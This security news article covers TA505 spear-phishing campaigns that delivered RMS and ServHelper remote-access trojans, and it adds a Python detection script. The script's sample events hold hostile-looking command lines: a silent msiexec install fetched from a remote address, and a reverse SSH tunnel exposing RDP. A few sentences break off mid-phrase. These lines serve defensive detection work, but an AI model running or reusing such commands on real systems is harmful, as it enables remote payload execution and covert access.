Security experts at CyberInt uncovered a new campaign of a Russian financially motivated threat actor tracked as TA505. The hackers used remote access Trojans (RATs) in attacks aimed at financial entities in the United States and worldwide.
“CyberInt researchers have been tracking various activities following the spear-phishing campaign targeting large US-based retailers detected in December 2018.” reads the analysis published by Cyberint. “The research focused on scenarios with the same tactics, techniques and procedures (TTP) along with the repeated nefarious use of a ‘legitimate’ remote administration tool ‘Remote Manipulator System’ (RMS), developed by a
The TA505 group was first spotted by Proofpoint back in 2017; it has been active since at least 2015 and targets organizations in the financial and retail industries.
The group has carried out a large number of campaigns using weaponized Office and PDF documents to deliver notorious malware, including the Dridex banking trojan, the tRat and FlawedAmmyy RATs, and the Philadelphia, GlobeImposter and Locky ransomware families.
Tracked by the research community as TA505, the Russian threat group is known for the use of banking Trojans such as Shifu and Dridex, as well as for the massive Locky ransomware campaigns observed several years ago.
In recent attacks the experts observed the group using new backdoors, including the modular tRat and ServHelper.
In campaigns carried out between December 2018 and February 2019, the TA505 group leveraged the Remote Manipulator System (RMS) backdoor to target financial institutions in Chile, India, Italy, Malawi, Pakistan and South Korea, and retailers in the United States.
In December 2018 the group also targeted large US retailers and organizations in the food and beverage industry with spear-phishing attacks. The phishing messages used a
The investigation conducted by the researchers allowed them to uncover other campaigns conducted between December 2018 and March 2019.
Hackers hit targets in many countries worldwide, including Chile, India, Italy, Malawi, Pakistan and South Korea. Researchers believe that other attacks against targets in China, Great Britain, France and the United States could be attributed to the same threat actor.
The weaponized documents used in the attacks leverage Microsoft Windows Installer (msiexec) to fetch a payload from the C2 and execute it.
Experts also observed the attackers using the ServHelper RAT since November 2018; it allows them to set up reverse SSH tunnels so that the compromised machine can be reached via RDP from the outside.
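The two behaviours just described (Windows Installer pulling a package from a remote URL, and an SSH client started with a remote port forward that exposes RDP) are both visible in process-creation telemetry. The following is an added detection example, not code or indicators from the Cyberint report: the regexes, rule names and the Sysmon-style sample events are constructed here for illustration (the IP addresses are RFC 5737 documentation ranges) and should be tuned to your own environment.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style, simplified).
# These are NOT indicators from the Cyberint report; addresses are documentation ranges.
SAMPLE_EVENTS = [
    {   # Office document spawning msiexec with an HTTP package: the documented TA505 pattern
        "image": r"C:\Windows\System32\msiexec.exe",
        "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "cmdline": r"msiexec.exe /q /i http://203.0.113.10/update.msi",
    },
    {   # Benign: a user installing a local MSI from Explorer
        "image": r"C:\Windows\System32\msiexec.exe",
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": r"msiexec.exe /i C:\Users\alice\Downloads\7z1900-x64.msi",
    },
    {   # Reverse SSH tunnel (-R) exposing local RDP (3389) on a remote host, over port 443
        "image": r"C:\ProgramData\ssh\ssh.exe",
        "parent": r"C:\ProgramData\svchost.exe",
        "cmdline": r"ssh.exe -N -R 127.0.0.1:6543:127.0.0.1:3389 user@203.0.113.20 -p 443",
    },
    {   # Benign: a local (-L) forward used by a developer
        "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
        "parent": r"C:\Windows\System32\cmd.exe",
        "cmdline": r"ssh.exe -L 8080:localhost:80 dev@intranet.example",
    },
]

# Each rule is (image pattern, command-line pattern); both must match.
RULES = {
    # Windows Installer asked to install/advertise a package from an http(s) URL.
    "msiexec_remote_package": (
        re.compile(r"(?:^|\\)msiexec\.exe$", re.I),
        re.compile(r"(?:^|\s)/(?:i|package|a)\s+\"?https?://", re.I),
    ),
    # OpenSSH or plink started with a remote forward (-R) whose target port is RDP.
    "reverse_ssh_tunnel_rdp": (
        re.compile(r"(?:^|\\)(?:ssh|plink)\.exe$", re.I),
        re.compile(r"(?:^|\s)-R\s*\S*:3389\b", re.I),
    ),
}

# Parent processes that should never legitimately launch the matched tools.
OFFICE_PARENTS = re.compile(r"\\(?:winword|excel|powerpnt|outlook)\.exe$", re.I)


def detect(event):
    """Return the names of all rules that match one process-creation event."""
    hits = []
    for name, (image_re, cmd_re) in RULES.items():
        if image_re.search(event["image"]) and cmd_re.search(event["cmdline"]):
            hits.append(name)
    # Escalate: a match spawned directly by an Office application is the
    # maldoc-to-installer chain rather than an admin action.
    if hits and OFFICE_PARENTS.search(event.get("parent", "")):
        hits.append("spawned_by_office_document")
    return hits


def scan(events):
    """Return (index, hits) for every event that matched at least one rule."""
    results = []
    for i, event in enumerate(events):
        hits = detect(event)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(hits)} :: {SAMPLE_EVENTS[index]['cmdline']}")
```

The msiexec rule will also fire on legitimate software deployment that installs packages straight from a web server, so in practice it is the combination with an Office parent process, or a URL outside the organisation's known distribution hosts, that should be alerted on; the tunnel rule is narrower, since an interactive user rarely has a reason to publish their own RDP port on a remote machine.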
The report states that the indicators of compromise identified in the US retail campaign are consistent with an attack against the Notary Chamber of Ukraine conducted by the same threat actor in December 2018.
At the time, the threat actor was delivering the RMS Trojan in spear-phishing attacks.
Further technical details on the attacks are included in the report published by Cyberint.
(SecurityAffairs – hacking, VSDC)